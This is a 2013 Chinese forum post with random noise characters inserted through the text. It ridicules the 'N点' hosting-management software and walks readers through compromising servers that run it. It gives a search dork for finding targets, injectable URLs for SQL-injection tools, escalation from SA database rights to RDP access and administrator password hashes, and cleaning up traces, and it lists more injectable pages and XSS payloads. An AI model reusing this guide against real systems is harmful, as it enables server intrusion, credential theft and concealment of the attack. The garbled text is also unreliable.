不得不说N点实在是一个破东西) j Q9 Z! f$ L. b9 d5 o
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
2 r) h/ Z6 H$ b& |& X1 y& Y5 ] C好吧 抱怨一下就行了 接下来关键的时候到了; i9 X- z! B, e5 x
首先百度搜索关键字:inurl: (mmdatabase.asp)
; Y* }4 D2 O4 \9 Y( L5 c5 }我随便列举一个: www.xxxx.com
0 j: h2 Q1 e" T1 V6 P' Y修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1- k7 u* N+ e, y# O W3 J
扔入NBSI 或者啊D等各种傻逼工具后1 I, e) g8 {9 E F
你们会看到是SA权限
* M, N' f% X# L& A: \% `1 {果断3389 上去 hash得到administrator密码
9 }! z1 \! V2 f0 M5 K擦屁股走人~
; U' P" E+ O2 U5 o( v: i$ o经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的$ l# J/ G! m6 r9 T/ `& W2 Z
8 r! F: H b9 c* k/ ~& X再附上其他几个漏洞页面
y/ d5 a! w2 U, {SQL:
& m, T6 c% O3 i0 X" Z9 ?http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
1 W1 `& J3 ^/ ^- c* s) Q. |http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11' \- `$ j; { p" T1 }2 p: R% f4 H
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
, I' E, ~. r8 R6 Shttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2. l |( z$ m" W) w! ]( m
XSS证明:0 G& ^8 y* h$ u+ L% L' \2 Y
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);” L7 ~- q# I, k* P0 N" P/ n7 S
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”2 h- R$ J9 H5 u2 n7 @
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>5 s; [, ]* b1 Q' `1 e
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
0 y4 _; E, t& t' U7 n o- q0 q还是星外吧 你们懂的; |* B0 x0 c8 G$ c
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?1 t9 O4 K4 I4 D, K) q
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
# ^9 V; Z9 i9 I& ?4 Z4 _* l——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对